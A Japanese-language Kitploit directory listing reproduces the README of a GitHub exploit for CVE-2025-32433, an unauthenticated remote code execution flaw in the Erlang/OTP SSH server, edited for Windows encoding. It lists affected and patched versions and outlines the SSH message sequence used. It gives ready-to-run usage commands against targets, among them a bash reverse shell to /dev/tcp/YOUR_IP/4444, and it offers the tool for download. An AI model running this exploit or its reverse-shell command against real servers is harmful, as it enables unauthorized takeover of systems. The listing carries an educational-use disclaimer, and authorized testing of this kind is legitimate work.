Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-32433-Exploit-edited — 元のバージョンに基づく:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Windows互換性のためにUnicodeチェックマークをASCII文字に置き換える | Kitploit
ツール/GitHubGitHub/chuzoux/cve-2025-32433-exploit-edited
脆弱性分析エクスプロイトペネトレーションテスト学習と教育レッドチーミングリモートアクセスツール
GitHubchuzoux/cve-2025-32433-exploit-edited

CVE-2025-32433-Exploit-edited

元のバージョンに基づく:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Windows互換性のためにUnicodeチェックマークをASCII文字に置き換える

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
2ヶ月前未レビュー

CVE-2025-32433 エクスプロイト (Windows 互換)

Erlang/OTP SSH 認証なしリモートコード実行

説明

このリポジトリには、Erlang/OTP SSHサーバーにおける致命的な認証なしリモートコード実行脆弱性であるCVE-2025-32433のエクスプロイトが含まれています。

主な特長:

  • ✅ 事前認証RCEエクスプロイト
  • ✅ Windows GBKエンコーディング互換性のために修正
  • ✅ Erlang/OTP バージョン ≤ 27.3.2、≤ 26.2.5.10、≤ 25.3.2.19 で動作

脆弱性の詳細

CVE ID: CVE-2025-32433
重大度: 重大
影響: 認証なしリモートコード実行

この脆弱性により、攻撃者は特別に細工されたSSHプロトコルメッセージを送信することで、認証なしにErlang/OTP SSHサーバー上で任意のシステムコマンドを実行できます。

影響を受けるバージョン

root@kitploit:~
OTP ≤ 27.3.2
OTP ≤ 26.2.5.10
OTP ≤ 25.3.2.19
OTP ≥ 17.0 and older (likely)

使用方法

root@kitploit:~
# Basic command execution
python exploit.py -t <target-ip> -p 2222 -c "whoami"

# Execute system command
python exploit.py -t 192.168.1.100 -p 2222 -c "touch /tmp/pwned"

# Raw Erlang code execution
python exploit.py -t 192.168.1.100 -p 2222 -e 'os:cmd("id").'

# Reverse shell
python exploit.py -t 192.168.1.100 -p 2222 -c "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"

引数

root@kitploit:~
-t, --target    Target IP address (default: 127.0.0.1)
-p, --port      Target port (default: 2222)
-c, --command   System command to execute
-e, --erlang    Raw Erlang code to execute

Windowsエンコーディング修正

このバージョンは、元のエクスプロイトに存在するエンコーディング問題を修正しています。

問題: 元のエクスプロイトはUnicodeのチェックマーク文字(✓、U+2713)を使用しており、WindowsでGBKエンコーディングエラーが発生します:

root@kitploit:~
'gbk' codec can't encode character '✓' in position 1: illegal multibyte sequence

解決策: Unicode文字を標準ASCIIの+文字に置き換え、クロスプラットフォーム互換性を実現しました。

技術的詳細

このエクスプロイトは次の手順で動作します:

  1. SSH接続とバナー交換の確立
  2. SSH_MSG_KEXINITパケットの送信
  3. SSH_MSG_CHANNEL_OPENによるSSHチャネルのオープン
  4. 認証前に悪意のあるexecコマンドを含むSSH_MSG_CHANNEL_REQUESTを送信
  5. os:cmd()を介した任意のErlangコードの実行

参考文献

  • GitHubセキュリティアドバイザリ
  • Erlang/OTP コミット修正
  • RFC 4254 - SSH接続プロトコル
  • ProDefense CVE-2025-32433

パッチ適用済みバージョン

  • OTP 27.3.3
  • OTP 26.2.5.11
  • OTP 25.3.2.20

免責事項

このエクスプロイトは、教育および許可されたセキュリティテストの目的でのみ提供されています。コンピュータシステムへの無許可アクセスは違法です。責任を持って、明示的なテスト許可を得たシステムでのみ使用してください。

ライセンス

MIT License

作者

Windows互換性のためにchuzouXによって修正

ツールをダウンロード